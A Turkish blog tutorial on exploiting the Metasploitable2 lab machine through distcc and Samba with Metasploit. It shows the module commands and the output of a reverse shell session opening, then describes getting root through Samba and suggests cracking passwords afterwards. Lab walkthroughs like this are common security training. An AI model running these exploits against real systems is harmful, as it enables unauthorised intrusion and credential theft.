Eylül 26, 2022
11 11 11 ÖÖ
2048 Old Game Privacy Policy
Scan Text – Metin Tarayıcı Terms & Conditions
Scan Text – Metin Tarayıcı Privacy Policy
Calculator – Hesap Makinesi Privacy Policy
Calculator – Hesap Makinesi Terms & Conditions
QR Code Reader – Kare Kod Okuyucu Terms & Conditions
QR Code Reader – Kare Kod Okuyucu Privacy Policy
Show PDF – PDF Görüntüleyici Terms & Conditions
Show PDF – PDF Görüntüleyici Privacy Policy
Photo Editor – Resim Düzenleme Uygulaması Terms & Conditions
Son Yazılar
2048 Old Game Privacy Policy Scan Text – Metin Tarayıcı Terms & Conditions Scan Text – Metin Tarayıcı Privacy Policy Calculator – Hesap Makinesi Privacy Policy Calculator – Hesap Makinesi Terms & Conditions QR Code Reader – Kare Kod Okuyucu Terms & Conditions QR Code Reader – Kare Kod Okuyucu Privacy Policy Show PDF – PDF Görüntüleyici Terms & Conditions Show PDF – PDF Görüntüleyici Privacy Policy Photo Editor – Resim Düzenleme Uygulaması Terms & Conditions
metasploitable2 exploit

Distcc – Samba Zafiyet Nasıl Yapılır ?

Paylaşım , Takip İçin

Distcc Nedir ?

Distcc yani Distributed c compiler bir ağ ortamının derleme işlemini yapar fakat bu işlemi bir çok cihaza dağıtır. Bu sayede compiler işlemi hızlanır.

distcc ile ağ üzerinde başka bir bilgisayara derlemesi için kod gönderilip çalıştırılabilir. Böylece işlemci gücü başka bilgisayarlar üzerine dağıtılabilir.  distcc nin sistem üzerinde çalıştığı nmap çıktısından görülebilir.

 

3632/tcp  open  distccd              distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

msf > search distcc

Matching Modules

================

   Name                       Disclosure Date      Rank   Description

   —-                       —————      —-   ———–

   exploit/unix/misc/distcc_exec  2002-02-01 00:00:00 UTC  excellent  DistCC Daemon Command Execution

msf > use exploit/unix/misc/distcc_exec

msf exploit(distcc_exec) > show options

Module options (exploit/unix/misc/distcc_exec):

   Name   Current Setting  Required  Description

   —-   —————  ——–  ———–

   RHOST               yes   The target address

   RPORT  3632         yes   The target port

Exploit target:

   Id  Name

   —  —-

   0   Automatic Target

msf exploit(distcc_exec) > set RHOST 192.168.138.129

RHOST => 192.168.138.129

msf exploit(distcc_exec) > exploit

[*] Started reverse double handler

[*] Accepted the first client connection…

[*] Accepted the second client connection…

[*] Command: echo D9qIC8zE36yTf19G;

[*] Writing to socket A

[*] Writing to socket B

[*] Reading from sockets…

[*] Reading from socket B

[*] B: “D9qIC8zE36yTf19G\r\n”

[*] Matching…

[*] A is input…

[*] Command shell session 1 opened (192.168.138.128:4444 -> 192.168.138.129:36354) at 2013-07-28 09:23:39 +0300

uname -a

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Gördüğünüz gibi shell oturumumuza geçmiş olduk . uname -a komutumuz ile sızdığımız sistemin bilgilerini aldık dilerseniz meterpreter veya shell komutlarıyla daha fazla bilgi alabiliriz.

Samba

Samba Nedir ?

Samba Linux , Windows gibi işletim sistemleri arasındaki iletişimi sağlar. Bu iletişimi ağ sunucu olması sayesinde sağlar. 

Samba bir Netbios Açığıdır. (samba)

Metasploit frameworkümüze girdikten sonra search samba komutuyla açık ile ilgili modülleri listeleyelim.

usermap_script imizi seçip gerekli bilgilerin ne olduğunu info ile öğreniyoruz 

RHOST kısmındaki değişliği yaptıktan sonra yani exploit edeceğimiz hedef makinayı yazdıktan sonra exploit veya run ediyoruz

Görüldüğü gibi root ile sisteme giriş yaptık dilerseniz johntheripper ile şifreleri çözümleyebilirsiniz .


Paylaşım , Takip İçin
5 1 vote
Article Rating

Bir Cevap Yazın

1 Yorum
Eskiler
En Yeniler Beğenilenler
Inline Feedbacks
View all comments

[…] distcc […]

1
0
Would love your thoughts, please comment.x
HAYALİNDEKİ YAZILIM
%d blogcu bunu beğendi: